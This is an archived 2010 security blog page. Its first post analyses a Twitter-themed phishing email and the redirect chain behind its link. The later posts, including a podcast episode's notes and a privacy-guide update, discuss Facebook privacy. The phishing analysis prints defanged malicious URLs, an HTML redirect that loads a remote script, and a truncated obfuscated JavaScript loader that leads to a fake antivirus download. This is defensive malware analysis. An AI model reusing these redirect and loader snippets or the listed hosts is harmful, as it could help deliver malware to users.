Interesting New Twitter Phish Can Lead to Bad Places

I’ve had several fake emails that initially look like they come from Twitter in my email recently.  I didn’t think anything of it until several of my friends forwarded me the same type of emails.  This suggests two things.  One, that these emails are starting to hit a larger audience.  Or two, they are targeting just my friends and I which is totally possible. :-) Anyway, here is a quick bit of analysis of one of these emails.  I found some interesting things when I investigated the website linked in the fake email.  The link in this particular could have done more damage if it wasn’t for some crappy attacker code.  Read on!

The Email
The following screen shot shows you what the email looks like.  It seems to come from Twitter but you will notice that there are some interesting clues that tell you this isn’t real.  First, the Twitter account mentioned is just the first part of the email address this was sent to.  This may or may not be your Twitter ID.  Second, check out the “Britney Spears home video feedback” subject line and “Antidepressants for your bed vigor” bold red in the message body.  Yep.  All the signs that this isn’t from Twitter.  Ok, nothing to see here right?

The Link
When you look at the source of the email, the link actually goes to “hxxp://89.161.148.201/cekfcq.html”. If you do click on this link several things happen:

An HTML page is loaded which redirects you to a shady Russian software site.  This site (software-oemdigital.ru) has a ton of phisy looking domains that were assigned to it since 6/11/2010.  The HTML file also loads a script which runs a PHP file on another server.  Let’s take a look at the response:

HTTP/1.0 200 OK
Connection: close
Content-Length: 250
Content-Type: text/html
Date: Wed, 23 Jun 2010 15:09:53 GMT
Last-Modified: Wed, 23 Jun 2010 08:30:01 GMT
Server: IdeaWebServer/v0.70

<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.01 Transitional//EN”>

<META HTTP-EQUIV=”refresh” CONTENT=”0;URL=hxxp://software-oemdigital.ru”>
<title></title>

<html><head>
</head></html><script src=hxxp://eurolisting.net/Cgi-bin/markprint.php ></script>

The Russian software site loads as normal but something else is going on in the background from eurolisting.net and that PHP file.  Here is the response:

HTTP/1.1 200 OK
Connection: close
Date: Wed, 23 Jun 2010 17:46:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1287414902; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/javascript

// <script>
function cxx(wcH){return wcH.replace(/%/g,”).replace(/[‘ow:Y]/g,fUp)}
cPH7j=’d:6fcY75meY6et.Y77rio74w65(Y22o3cdiv stylew3d:5cY22pw6fsitio6fnY3aaw62so6fl:75o74Y65o3b lefto3a:2d1000pxY3bw20tY6fp:3aw2d10w300pxw3bo5cw22:3ew22Y29w3b:66unctiY6fn :6973(a)o7bdY6fcu:6deY6et.w77rw69te(:22:3cifrao6d:65w20srcw3do5co22httw70Y3ao2f <SNIP>

All of the stuff following the script tag is obfuscated JavaScript.  I cut most of it out as it is quite lengthy.  Running this through jsunpack (a JavaScript unpacker) the script tries to load several things including some VBScript that seems to check for system properties, if you are running Firefox and if you have Java and/or Flash enabled as well as what seems to be a check for Adobe Reader plug-ins.  You can check out the script and the unpacked version over at the jsunpack site.

Now this is where it gets interesting.  In Internet Explorer the PHP file seems to generate a request to a URI that doesn’t exist: hxxp://89.161.148.201/zzz/ttt/ad3740b4.class, it 404′s.  You can also see this in the Wireshark capture below:

In Firefox it’s a different story.  The Russian software site still loads and something else attempts to get requested:

hxxp://wiki.insuranceplanningaz.com/main.php?h=89.161.148.201&i=JcmridQaq/ykgRj4UMpOy5Ec&e=4

This site will lead to some fun “fake AV” which prompts you to download a “setup.exe” file.

You probably don’t want to run that file.  The good news is that if you have the latest version of Firefox it will note this as a reported web forgery and tries to prevent you from going there.  One problem I see is that if you are running an older version of Firefox you might not get this notification.  I haven’t tested this with other browsers but your results may vary.

What does this all mean?  Well of course don’t click on shady emails like this.  You know better right?  Also, don’t think that because you use Firefox you are safe from attacks like these!  Attackers are catching on and I would suspect we will see more attacks targeting multiple browsers besides IE.  Wait, too late isn’t it?  Special thanks to Greg and Tyler for providing intel about these domains and some of the analysis.

Share and Enjoy


FacebookTwitterDeliciousDiggStumbleUponAdd to favoritesEmailRSS


Social Media Security Podcast 15 – Current Facebook Security Issues, New Privacy Tools, Likejacking, Formspring, Social Media at Work

This is the 15th episode of the Social Media Security Podcast recorded June 11th, 2010.  This episode was hosted by Tom Eston and Scott Wright.  Below are the show notes, links to articles and news mentioned in the podcast:

Please send any show feedback to feedback [aT] socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  You can also subscribe to the podcast in iTunes. Thanks for listening!

Facebook Privacy & Security Guide Updated to v2.2

I have updated the Facebook Privacy & Security Guide to version 2.2 over on SocialMediaSecurity.com.  If you’re not familiar with the guide it is an easy to use guide which helps you set the recommended privacy and security settings on your Facebook account.  It’s free, printable and meant to be shared.

This update includes details on all the recent changes to Facebook’s privacy settings that went live May 26, 2010.  I have also included more information on “Instant Personalization”, removing yourself from “Platform”, and how your public information can be accessed via the Facebook Graph API.  Note that you may not have these settings enabled on your Facebook profile…yet.  They are slowly being rolled out to the Facebook user base and may take a few weeks.  Please share with friends, family and others!

Download the latest version of the Facebook Privacy & Security Guide here.

Share and Enjoy


FacebookTwitterDeliciousDiggStumbleUponAdd to favoritesEmailRSS


My Thoughts on the New Facebook Privacy Controls

Ever since I started the Facebook Privacy & Security Guide back in October 2008 I knew that Facebook’s privacy settings were confusing for the average user.  Many of my concerns back then centered around friends and family that had no idea there were even privacy settings to configure on Facebook.  It has also never been in Facebook’s financial interest to *really* show you how to protect the information you post.  These are all reasons was why I started the guide and hopefully over the last few years it has helped spread some awareness on how to control the information you post a little better.  Working on the guide has been frustrating at times because Facebook would make settings more confusing, remove settings that were useful and then bring them back again in some other form.  In the latest versions of the guide I often wondered how I was going to fit all the settings and their explanations into a two-sided handout.  The handout format has always been important to me so it could be easily distributed. :-)

Jumping forward to today we see yet another iteration of these settings.  I don’t have the settings on my Facebook account yet so I haven’t updated the guide but I have read some of the information already out there.  The EFF has a good post up about the new settings.  They even have a YouTube video showing you the changes and their recommendations.  The other post you should read is one by theharmonyguy who, as always, has very good analysis of these settings and Facebook overall.

My thoughts are pretty much along the same lines as the EFF and others.  However, I will say that no matter what changes Facebook makes to their privacy settings they *will* find ways to use your information to make money.  This is Mark Zuckerberg’s business model and that won’t change anytime soon.  I will leave you with a fantastic quote that I think sums up all the media drama leading up to these new privacy controls.  This is a quote from Bruce Schneier.  It’s from an article he did for Forbes regarding statements that “Privacy is Dead”:

“It’s just not true. People, including the younger generation, still care about privacy. Yes, they’re far more public on the Internet than their parents: writing personal details on Facebook, posting embarrassing photos on Flickr and having intimate conversations on Twitter. But they take steps to protect their privacy and vociferously complain when they feel it violated. They’re not technically sophisticated about privacy and make mistakes all the time, but that’s mostly the fault of companies and Web sites that try to manipulate them for financial gain.”

Share and Enjoy


FacebookTwitterDeliciousDiggStumbleUponAdd to favoritesEmailRSS


Facebook Backtracks on Privacy Controls and Public Information

Facebook CEO Mark Zuckerberg held a press conference today announcing significant changes to the site’s privacy settings. The latest updates come after weeks of debate and criticism over Facebook’s handling of user information. Though it may take several days or weeks to roll out the new controls, an official privacy guide provides a summary of how they work. Full details are still rolling in, but certain aspects are already clear.

First, the new interface for making many changes appears to be much more streamlined. This should be a welcome change to those confused by the previous litany of options. The primary privacy page displays a table with columns for “Everyone,” “Friends of Friends,” and “Friends Only,” with rows for several categories of content. This table not only establishes settings for certain bits of profile information; it also lets users set defaults for new content shared.

Second, Facebook has removed the requirement that “connections,” such as your list of friends and the pages you “like,” always be publicly available information. A secondary page will provide access controls for certain groups of these connections, as well as who can friend you, send you messages, or see your profile in search results.

Third, users will have new options related to third-party applications that integrate with Facebook. The company had previously announced a granular permissions model for applications, and developers are in the process of transitioning to the new setup. Those permissions will now be reflected in the privacy settings, though how that will look is not yet clear. (Also, Facebook’s privacy guide assures users that applications can only request “information that’s needed for them to work,” but that’s up to developers.) Facebook is also re-instating an option to completely opt-out from the Facebook Platform. This setting had been available prior to changes last fall. However, it now appears that this opt-out will also be the only way to avoid public content being indexed by search engines.

Zuckerberg promised an “easy” way to opt-out of the controversial instant personalization program, which lets certain third-party websites automatically identify Facebook visitors, but the feature remains opt-out. Many of the other privacy settings are also still opt-out in that the site defaults appear to remain the same, presented as “Recommended” when a new user checks them.

I’ve been concerned about the tone of some Facebook responses to recent privacy concerns, and today’s presentation by Zuckerberg was no exception. He noted that the company had not seen any noticeable impact on site usage lately, and according to one report commented, “Perhaps the personal privacy preferences of liberal advocacy groups and DC politicians don’t match with those of the general public.” That may be true, though I think politicians or privacy advocates have a deeper understanding of recent changes than the general public. Still, this sort of remark comes across as at best somewhat irritated and at worst rather arrogant. It also probably won’t win over any liberal advocacy groups or DC politicians. (For the record, I don’t fall into either category.)

Other aspects of the announcements lead me to wonder how much Facebook truly understands the rising worries over the site’s handling of privacy issues.  Zuckerberg emphasized the site’s focus on sharing, that users want to share, and his belief that people want to share more openly. The default privacy options clearly reflect this belief, positioning Facebook as a site generally intended for public sharing.

But I think Zuckerberg is confusing the desire to share easily or freely and the desire to share publicly. Several researchers have explored how people approach privacy, and people constantly use services such as Facebook to post content they would not want distributed to the entire Internet. We’ve become accustomed to the idea of being private in public, since our offline conversations in public settings are not recorded and indexed for anyone to search. What would be the harm to users if content was private by default, but could be opened to the public if the author wanted that? After all, this is how Facebook operated for the first few years of its existence – and it likely played a significant role in the site’s growth.

Of course, while an opt-in approach may help many users, Facebook wants users to share more openly. More public content provides more value for other services that might integrate with Facebook, extending the site’s reach and influence. That’s part of why I find it difficult to simply accept Zuckerberg’s notion that most people are moving towards public sharing on their own: regardless of what individuals think, Facebook itself certainly has an opinion on how much you should share.

And that’s the real question – how much you share, not whether you share. I’ve never been opposed to making it easier for users to share content. But I do have a problem when a site that was built on sharing with a limited audience reorganizes to make that same type of sharing more difficult than fully public sharing – an activity that carries far more potential dangers, both social and otherwise.

Facebook has built an unprecedented audience of users who give it significant trust. I’m glad to see the company making welcome changes which assist users who actively care about privacy controls. But I remain concerned that the company’s overall perspective still reflects questionable ideas, such as the notion most people are not concerned about privacy, and either fails to recognize the company’s role as a trend-setter or ingenuously downplays it. That’s not a personal attack on Zuckerberg, whom I’ve never met, or anyone else at Facebook. It’s simply my evaluation of the service’s direction based on recent features and public relations. And I think Facebook owes its users much better.

Social Media Security Podcast 14 – Recent Facebook Hacks and Controversy, Diaspora, Swipely

This is the 14th episode of the Social Media Security Podcast recorded May 14th, 2010.  This episode was hosted by Tom Eston and Scott Wright.  Below are the show notes, links to articles and news mentioned in the podcast:

Please send any show feedback to feedback [aT] socialmediasecurity.com or comment below.  You can also call our voice mail box at 1-613-693-0997 if you have a question for our Q&A section on the next episode.  You can also subscribe to the podcast in iTunes. Thanks for listening!

Quitfacebookday.com happens on May 31, 2010 – Should you quit, too?

It seems like maybe I talk too much about Facebook security. But it’s a growing issue in the news these days. As you can see from the image next to this blog post on my website, one of the most searched terms in Google is now “How do I delete my Facebook account?” (In fact, as of today, if you type “Delete” into a Google search, the top suggestion is “Facebook account”) So, I’m debating quitting Facebook on May 31 with the others who are disgusted with the site’s disregard for privacy and security. (See http://www.quitfacebookday.com)

My reasons include:

(1) You can’t seem to depend on anything you put there to be kept private – more due to constant policy changes than hackers;

(2) Facebook is now one of the biggest sources of phishing scams on the Internet, which are causing real losses;

(3) On any given day, the privacy of your data may depend on your FRIENDS’ settings, not just yours;

(4) Very few people are able to decipher the privacy settings to choose meaningful rules, which leaves them exposed – even me;

(5) Facebook shares your data with other sites (through the Open Graph API, the Like Button or Instant Personalization) in ways that can cause embarrassment and lead to identity theft;

(6) Facebook does not appear to be abiding by its agreement with the Privacy Commissioner or Canada to improve its handling of private information.(http://www.priv.gc.ca/media/nr-c/2009/let_090827_e.cfm)

Arguments against quitting Facebook include:

(1) All the “hip” young people say “Privacy is dead. Build a bridge and get over it…”

– Chanting this may make them feel good, but doesn’t change the fact that the easiest place to be scammed or have your password stolen is through social media sites that have very weak security and authentication. People must still care about their privacy, if only to ensure that persecution and other politically motivated abuses don’t victimize innocent people – it’s a slippery slope.  Privacy commissioners have a very difficult job these days. But it is an increasingly important one.

(2) How will I connect to friends and family without Facebook?

– How did you do it in 2003? It also depends on whether you use Facebook for “reading” or “writing” or “both”. If you just like to “see” what’s going on, you can use Twitter, with the caveat that you need to be careful of those short URLs that can take you to dangerous places. But tools like Brizzly.com can expand the links for you, so you’ll know where they are leading you. However, if you like to write lots of personal details of your life, and only want to share it with friends, that’s the biggest challenge right now – because even Facebook doesn’t provide assurance that your private posts won’t be shared with people you might not want to see them. There aren’t many tools that are widely used and can do this. But they are coming. So, maybe it’s better to wait.

(3) One person quitting from a group of 400 Million isn’t going to make a difference.

– It’s true that the numbers make this initiative look futile. So, for most people, quitting won’t make a difference to anyone. But if you are a person of authority, especially a security or privacy authority, your actions can show the people around you that this is a serious issue. Parents telling their kids that they are quitting – and why – may or may not have an impact (depending on whether the ear-plugs are in or not).

Public figures like Leo Laporte  can have a significant effect on their followers. (Click  HERE for the story which includes a link to the WikiHow page on how to quit Facebook)

As a security consultant who has been following this trend, I am asking people to take it seriously. If you are a security manager in a company, you can also have an influence on your co-workers, as long as they don’t see you as being heavy-handed, or crying “wolf” – which may be unavoidable in some cases.

(4) If all the security and privacy advocates quit Facebook, who will counsel those who still use it to let them know about the risks in their own “element”?  Good question. I don’t have an answer to that one. I may leave a Facebook page up (which is different from a personal profile). That way, people can still reach me and see what I have to say, publicly, and maybe understand why I no longer have a personal profile… and maybe they shouldn’t either.

What will the future of social networking look like?

I believe something will come along that is more secure than Facebook, and will provide the connections we need – without as much risk. But it may take a while. There is an initiative called Diaspora (http://www.joindiaspora.com/), which has this very intent. While its initial incarnation seems to have a few serious weaknesses of its own, this is the kind of thing that needs to happen to combine a great vision for social networking with a level of trust that can be sustained.

So, what do you think?

(1) Should I quit Facebook on May 31? or sooner?

(2) Will you quit Facebook?

Feel free to comment below. (NOTE: If all you plan to say is “Privacy is Dead”, get ready for a flaming arrow!)

Here’s how to delete your facebook account – http://www.wikihow.com/Permanently-Delete-a-Facebook-Account


I am now offering monthly briefings, tailored to organizations that want to build and sustain security awareness for staff. Just because your security team is too busy to do its own training and awareness doesn’t mean you can’t have an economical way to address human security risks. Please call or email me at the coordinates below…

Scott Wright

The Streetwise Security Coach

Join the Streetwise Security Zone at:
http://www.streetwise-security-zone.com/join.html

Phone: 1-613-693-0997
Email: scott@streetwise-security-zone.com
Twitter ID: http://www.twitter.com/streetsec

To receive weekly security tips and other notices about helpful content available on this site, please make sure you are on my list by clicking HERE, and entering your name and email address.

 

 

Site Meter

Why the Current Facebook Privacy Debate Matters

Privacy has been a hot topic of discussion among all sorts of technology-minded people lately. But take a moment to consider why this debate is even happening. One could list several events involving several companies that have all influenced the controversy, but generally, much of the talk stems from changes made by Facebook over the past year.

Why the Change?

And why did Facebook make those changes? There’s no technological reason for many of them. Nothing about liking pages or using social plug-ins forced the company to remove old access controls or make “instant personalization” an opt-out feature. Facebook’s executives made a policy and business decision to push users into more public sharing. In many ways, we’re having this debate because Facebook chose to make it an issue.

That’s not a criticism, simply an observation. In fact, many would probably say that Facebook was right to challenge ideas on privacy. Popular tech blogger Robert Scoble has repeatedly argued that Facebook’s changes bring many benefits to users. One writer at Fortune questioned any backlash and gave this response to Pandora’s new social setup: “My first reaction? Creepy! My second reaction: Cool!” Is it wrong to force users into a new situation that’s uncomfortable at first if it ultimately brings significant value?

In this case, however, the ultimate value to users remains unclear. Many users will certainly find advantages to a freer flow of information. But does Facebook really have the right to decide whether content people had previously restricted should now be available publicly? How can any of us judge whether the benefits outweigh the downsides for each user? Many users chose to put information in their profiles that they did not want shared beyond certain limits. If exposing that information seems trivial, are you certain you understand why the profile owner thought limits so important to begin with?

I would argue that by pushing the envelope on our understanding of privacy, Facebook’s leadership made changes that benefit the company, partly by also benefiting developers and partners. That’s not necessarily a bad thing – Facebook is a business and has to make money. But while those changes do benefit some users, perhaps even a majority of users, they also harm the trust of many other users who had shared private content on Facebook.

Where’s the Backlash?

In the short term, the benefits outweighed the downsides for Facebook. Several high-profile users have deleted their accounts, and others are following suit. But keep in mind that even if 10 million people stopped using the site, that would only be a 2% reduction in user base.

As the company faces widespread criticism and possible regulatory changes, you might expect Facebook to back down on some of their changes. I doubt it. Facebook’s executives know the company enjoys a very strong position in the market right now. They can afford losing 2% of users without breaking a sweat. And if people do leave, where will they go?

Given that level of security, why bother talking about Facebook privacy? Why does it matter if techie types bail on the service? Should we simply get used to having less control and move on?

To put it another way, should we let Facebook dictate our understanding of online privacy?

I realize Facebook will probably never go back to the way it once was and that there’s essentially no hope of meaningful competition in the short term. Yet Facebook didn’t reach this place overnight. Industry shifts take time. And many influential people in technology are often on the bleeding edge of such shifts.

Is Privacy Dead?

For the time being, though, Facebook users will likely react in one of three ways. First, they may not understand the implications of updates and keep using the site as before. Second, they might embrace the new capabilities and voluntarily unleash more content. Third, they will decide that they derive too much value from Facebook to let it go, and thus will, perhaps begrudgingly, keep their account – but they’ll be far more careful about what they post in the future.

I suspect that as awareness grows of how much data Facebook now distributes, many people will take more precautions in using the site. That’s not necessarily a bad thing – I’ve long argued for increased education of online dangers. People need to be careful online, regardless of how “private” a service seems. But care is not the same as paranoia or having to manage your identity the way a celebrity might. If Facebook wanted to increase intimacy and authenticity among online friends, they may find they’ve actually done the opposite.

Some people, such as Scoble or perhaps Mark Zuckerberg, have chosen to live their lives with “radical transparency.” Most of us probably still want to keep certain information private, and yet we routinely share that information with parties we trust – even online. I use my credit card number when shopping at Amazon, but I’d prefer they keep it to themselves. When I filled out web-based job applications last year, I often had to disclose my social security number – a small bit of data I would not want passed around. In a more offline example, I’ve often shared personal struggles with close friends in other states by talking with them on my mobile phone.

I realize that a determined hacker could possibly steal my payment info or even my SSN when I send that data to websites. I also know that my phone can be tapped or that my friends could repeat our conversations to others. But based on a wealth of factors, I make a decision to take those risks, since I judge the likelihood of these scenarios (especially given certain precautions I take) to be minimal.

The idea that any data you transmit to another computer should be considered public has significant merit. In practice, though, much of our offline lives face the same technical threat of publicity, and channels have long existed to share electronic data with only a limited audience. Most of us would not want the entire world to see all of our e-mails, and a range of businesses let only certain people access certain servers.

Which brings me back to one of my original points: nothing forced Facebook in a direction away from privacy. They chose it. I doubt whether they would have around 500 million users today if they had chosen that direction years ago. But even if Facebook now thinks I should share all of my content with everyone, I still find value in keeping some information limited. For me, that’s the essence of online privacy. And while one website with a very large audience may have reduced privacy by keeping me from using their features in a limited way, I will continue to exercise control over my data in other ways.

What Now?

The current debate about Facebook and privacy may seem confusing, futile, or even pointless. But it’s important to evaluate the background and ramifications of Facebook changes, especially given the company’s influence on industry trends. It’s important to realize that visible competition and meaningful alternatives to Facebook will require months or even years of development. And it’s important to understand how much privacy still plays a role in the way people manage and share information, whether online or offline.

Perhaps Facebook will end up right, and most people will move away from old ideas about privacy. But I’d rather see companies educate users on new features and empower them to choose more public sharing rather than expose previously private content and encumber such a change with illusory settings. Facebook may try to say most people don’t mind their new take on privacy, but I think they’ll find this debate is far from over.

1 6 7 8 9 10 35